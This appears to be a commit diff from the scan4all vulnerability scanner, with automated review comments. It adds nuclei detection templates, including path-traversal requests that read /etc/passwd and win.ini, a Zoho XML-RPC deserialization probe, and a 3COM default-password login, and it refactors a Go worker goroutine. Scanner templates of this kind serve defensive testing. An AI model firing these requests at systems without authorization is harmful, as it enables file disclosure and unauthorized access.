Projects STRLCPY scan4all Commits 64601ac2
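--- a/config/nuclei-templates/README.md
+++ b/config/nuclei-templates/README.md
@@ -42,18 +42,18 @@
 
 | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
-| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
-| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
-| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
-| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
-| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
-| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
-| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
-| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
-| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
+| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
+| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
+| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
+| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
+| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
+| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
+| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
+| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
+| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
+| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
 
-**294 directories, 4145 files**.
+**295 directories, 4195 files**.
 
 </td>
 </tr>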
  • config/nuclei-templates/TEMPLATES-STATS.json
    Unable to diff as some line is too long.
  • config/nuclei-templates/TEMPLATES-STATS.md
    Diff is too large to be displayed.
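--- a/config/nuclei-templates/TOP-10.md
+++ b/config/nuclei-templates/TOP-10.md
@@ -1,13 +1,13 @@
 | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
-| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
-| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
-| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
-| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
-| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
-| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
-| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
-| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
-| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
+| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
+| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
+| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
+| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
+| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
+| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
+| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
+| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
+| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
+| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
 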
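--- /dev/null
+++ b/config/nuclei-templates/cves/2014/CVE-2014-8676.yaml
@@ -0,0 +1,35 @@
+id: CVE-2014-8676
+
+info:
+ name: Simple Online Planning Tool 1.3.2 - Directory Traversal
+ author: 0x_Akoko
+ severity: medium
+ description: |
+ Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
+ reference:
+ - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
+ - https://www.exploit-db.com/exploits/37604/
+ - http://seclists.org/fulldisclosure/2015/Jul/44
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2014-8676
+ cwe-id: CWE-22
+ tags: cve,cve2014,soplanning,lfi,packetstorm
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+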
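--- /dev/null
+++ b/config/nuclei-templates/cves/2015/CVE-2015-7245.yaml
@@ -0,0 +1,33 @@
+id: CVE-2015-7245
+
+info:
+ name: D-Link DVG-N5402SP - Path Traversal
+ author: 0x_Akoko
+ severity: high
+ description: |
+ Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+ reference:
+ - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+ - https://www.exploit-db.com/exploits/39409/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-7245
+ cwe-id: CWE-22
+ tags: cve,cve2015,dlink,lfi,packetstorm,edb
+
+requests:
+ - raw:
+ - |
+ POST /cgibin/webproc HTTP/1.1
+ Host: {{Hostname}}
+
+ getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+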
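--- a/config/nuclei-templates/cves/2016/CVE-2016-6601.yaml
+++ b/config/nuclei-templates/cves/2016/CVE-2016-6601.yaml
@@ -14,7 +14,7 @@
  cvss-score: 7.5
  cve-id: CVE-2016-6601
  cwe-id: CWE-22
- tags: cve,cve2016,zoho,lfi,webnms
+ tags: edb,cve,cve2016,zoho,lfi,webnms
 
 requests:
  - method: GET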
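--- /dev/null
+++ b/config/nuclei-templates/cves/2021/CVE-2021-35380.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-35380
+
+info:
+ name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
+ author: fxploit
+ severity: high
+ description: |
+ A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
+ reference:
+ - https://www.swascan.com/solari-di-udine/
+ - https://www.exploit-db.com/exploits/50638
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-35380
+ cwe-id: CWE-22
+ tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+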
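Review bot: The `tags` line carries `cve2022` for a CVE that is dated 2021 and lives under `cves/2021/`, so year-based template selection (for example running only `cve2021`-tagged templates) skips this one and a `cve2022` run picks it up instead, and the per-tag counts in README.md and TOP-10.md are derived from these tags. Change it to `tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb`. The `cve-id` and `id` fields are already correct, so only the tag needs fixing.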
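--- a/config/nuclei-templates/cves/2022/CVE-2022-31269.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-31269.yaml
@@ -12,7 +12,10 @@
  - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
  - https://eg.linkedin.com/in/omar-1-hashem
  classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
+ cvss-score: 8.2
  cve-id: CVE-2022-31269
+ cwe-id: CWE-798
  metadata:
  shodan-query: http.title:"Linear eMerge"
  verified: "true"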
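--- a/config/nuclei-templates/cves/2022/CVE-2022-31798.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-31798.yaml
@@ -3,7 +3,7 @@
 info:
  name: Nortek Linear eMerge E3-Series - XSS
  author: ritikchaddha
- severity: high
+ severity: medium
  description: |
  There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
  reference:
@@ -11,7 +11,10 @@
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
  - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
  classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
  cve-id: CVE-2022-31798
+ cwe-id: CWE-79
  metadata:
  shodan-query: http.title:"eMerge"
  verified: "true"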
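--- /dev/null
+++ b/config/nuclei-templates/cves/2022/CVE-2022-35405.yaml
@@ -0,0 +1,59 @@
+id: CVE-2022-35405
+
+info:
+ name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
+ author: true13
+ severity: critical
+ description: |
+ This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
+ reference:
+ - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
+ - https://xz.aliyun.com/t/11578
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-35405
+ - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-35405
+ metadata:
+ shodan-query: http.title:"ManageEngine Password"
+ tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
+
+requests:
+ - raw:
+ - |
+ POST /xmlrpc HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+ <?xml version="1.0"?>
+ <methodCall>
+ <methodName>ProjectDiscovery</methodName>
+ <params>
+ <param>
+ <value>
+ <struct>
+ <member>
+ <name>test</name>
+ <value>
+ <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
+ </value>
+ </member>
+ </struct>
+ </value>
+ </param>
+ </params>
+ </methodCall>
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Failed to read result object: null"
+
+ - type: word
+ part: header
+ words:
+ - text/xml
+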
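Review bot: The `classification` block has no `cwe-id`, unlike every other CVE template added or touched in this commit, even though the description names the weakness class (deserialization of untrusted data). Add `cwe-id: CWE-502` after the `cve-id` line so the template is classified consistently and can be filtered on the weakness like the others.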
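--- /dev/null
+++ b/config/nuclei-templates/default-logins/3com/3com-nj2000-default-login.yaml
@@ -0,0 +1,37 @@
+id: 3com-nj2000-default-login
+
+info:
+ name: 3COM NJ2000 Default Login
+ author: daffainfo
+ severity: high
+ description: 3COM NJ2000 default admin credentials were discovered.
+ reference:
+ - https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
+ metadata:
+ verified: true
+ shodan-query: http.title:"ManageEngine Password"
+ fofa-query: body="NJ2000"
+ tags: default-login,3com,nj2000
+
+requests:
+ - raw:
+ - |
+ POST /login.html HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ password=password
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<title>3Com Corporation Web Interface</title>'
+ - '<frame name="mainFrame" src="blank.html">'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+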
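Review bot: The `shodan-query` under `metadata` is `http.title:"ManageEngine Password"`, the exact value used by the CVE-2022-35405 template in this same commit, which looks like a copy-paste slip: it describes a Zoho product, not the 3COM NJ2000, so anyone using the metadata to scope a scan would be pointed at the wrong asset class. Either drop the line (the `fofa-query: body="NJ2000"` already scopes this template) or replace it with a query derived from the title the body matcher expects, e.g. `shodan-query: http.title:"3Com Corporation Web Interface"` (constructed from the matcher on this page; confirm it returns matches before relying on it).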
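--- /dev/null
+++ b/config/nuclei-templates/exposed-panels/cvent-panel-detect.yaml
@@ -0,0 +1,31 @@
+id: cvent-panel-detect
+
+info:
+ name: Cvent Panel Detect
+ author: tess
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: http.html:"Cvent Inc"
+ tags: panel,cvent
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/Login.aspx'
+ - '{{BaseURL}}/manager/login.aspx'
+ - '{{BaseURL}}/GDSHost/Default.aspx'
+ - '{{BaseURL}}/events/EventRsvp.aspx'
+
+ stop-at-first-match: true
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Cvent Inc"
+ - "Cvent, Inc."
+ condition: or
+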
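--- /dev/null
+++ b/config/nuclei-templates/exposed-panels/omniampx-panel.yaml
@@ -0,0 +1,26 @@
+id: omniampx-panel
+
+info:
+ name: Omnia Node MPX - Panel
+ author: arafatansari
+ severity: info
+ metadata:
+ verified: true
+ shodan-query: http.html:"Omnia MPX"
+ tags: panel,omnia,omniampx
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Omnia MPX Node | Login"
+
+ - type: status
+ status:
+ - 200
+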
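--- /dev/null
+++ b/engine/engine.go
@@ -0,0 +1,48 @@
+package engine
+
+import (
+ "github.com/hktalent/scan4all/lib/util"
+ "github.com/hktalent/scan4all/pocs_go"
+ "log"
+)
+
+// 引擎总入口
+func init() {
+ util.RegInitFunc(func() {
+ // 异步启动一个线程处理检测,避免
+ go func() {
+ //nMax := 120 // 等xxx秒都没有消息进入就退出
+ //nCnt := 0
+ for {
+ select {
+ case <-util.Ctx_global.Done():
+ close(util.PocCheck_pipe)
+ return
+ case x1, ok := <-util.PocCheck_pipe:
+ if util.GetValAsBool("NoPOC") || nil == x1 || !ok {
+ //close(util.PocCheck_pipe) // 这行会在 NoPOC该标志开启时,其他进程无法传递过来而出错
+ log.Println("go_poc_checkout is over")
+ continue
+ }
+ //nCnt = 0
+ log.Printf("<-lib.PocCheck_pipe: %+v %s", *x1.Wappalyzertechnologies, x1.URL)
+ util.DoSyncFunc(func() {
+ func(x99 *util.PocCheck) {
+ pocs_go.POCcheck(*x99.Wappalyzertechnologies, x99.URL, x99.FinalURL, x99.Checklog4j)
+ }(x1)
+ })
+ default:
+ //var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
+ //fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
+ //<-time.After(time.Duration(1) * time.Second)
+ //nCnt += 1
+ //if nMax <= nCnt {
+ // close(util.PocCheck_pipe)
+ // return
+ //}
+ }
+ }
+ }()
+ })
+}
+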
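Review bot: The receive case on `util.PocCheck_pipe` folds the closed-channel signal (`!ok`) into the same branch as the NoPOC and nil checks and then `continue`s, so once the channel is closed every iteration immediately receives the zero value again and logs "go_poc_checkout is over" in a tight loop instead of exiting; the init removed from pocs_go/go_poc_check.go in this commit returned at that point. The empty `default:` arm has the same effect while the channel is merely empty: the select never blocks, so this goroutine busy-spins on a core for the life of the process (the one-second `time.After` that used to throttle it is commented out). Closing `util.PocCheck_pipe` from the receiving side in the `Done()` case also leaves any goroutine still sending on it exposed to a send-on-closed-channel panic, which the commented-out close below already hints at; I would leave that to the sender or at least note the hazard. Splitting the checks so a closed channel returns, a NoPOC/nil item is merely skipped, and the `default` arm is dropped restores the previous exit behavior; the enclosing init is entirely within the hunk.
```go
		for {
			select {
			case <-util.Ctx_global.Done():
				// NOTE(review): closing here races any goroutine still sending on PocCheck_pipe; a sender-side close is safer.
				close(util.PocCheck_pipe)
				return
			case x1, ok := <-util.PocCheck_pipe:
				if !ok {
					// channel closed: exit, otherwise the zero value is received forever
					log.Println("go_poc_checkout is over")
					return
				}
				if util.GetValAsBool("NoPOC") || nil == x1 {
					continue // drain and discard so senders are not blocked
				}
				// … unchanged: log and util.DoSyncFunc dispatch to pocs_go.POCcheck …
			}
			// default arm removed: a select without it blocks until work or cancellation arrives
		}
```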
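--- a/pocs_go/go_poc_check.go
+++ b/pocs_go/go_poc_check.go
@@ -25,7 +25,6 @@
  "github.com/hktalent/scan4all/pocs_go/zabbix"
  "log"
  "net/url"
- "os"
  "strings"
 )
 
@@ -270,45 +269,3 @@
  return technologies
 }
 
-func init() {
- if os.Getenv("NoPOC") == "true" {
- //close(util.PocCheck_pipe) // 这行会在 NoPOC该标志开启时,其他进程无法传递过来而出错
- return
- }
- util.RegInitFunc(func() {
- // 异步启动一个线程处理检测,避免
- go func() {
- //nMax := 120 // 等xxx秒都没有消息进入就退出
- //nCnt := 0
- for {
- select {
- case <-util.Ctx_global.Done():
- close(util.PocCheck_pipe)
- return
- case x1, ok := <-util.PocCheck_pipe:
- if nil == x1 || !ok {
- log.Println("go_poc_checkout is over")
- return
- }
- //nCnt = 0
- log.Printf("<-lib.PocCheck_pipe: %+v %s", *x1.Wappalyzertechnologies, x1.URL)
- util.DoSyncFunc(func() {
- func(x99 *util.PocCheck) {
- POCcheck(*x99.Wappalyzertechnologies, x99.URL, x99.FinalURL, x99.Checklog4j)
- }(x1)
- })
- default:
- //var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
- //fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
- //<-time.After(time.Duration(1) * time.Second)
- //nCnt += 1
- //if nMax <= nCnt {
- // close(util.PocCheck_pipe)
- // return
- //}
- }
- }
- }()
- })
-}
-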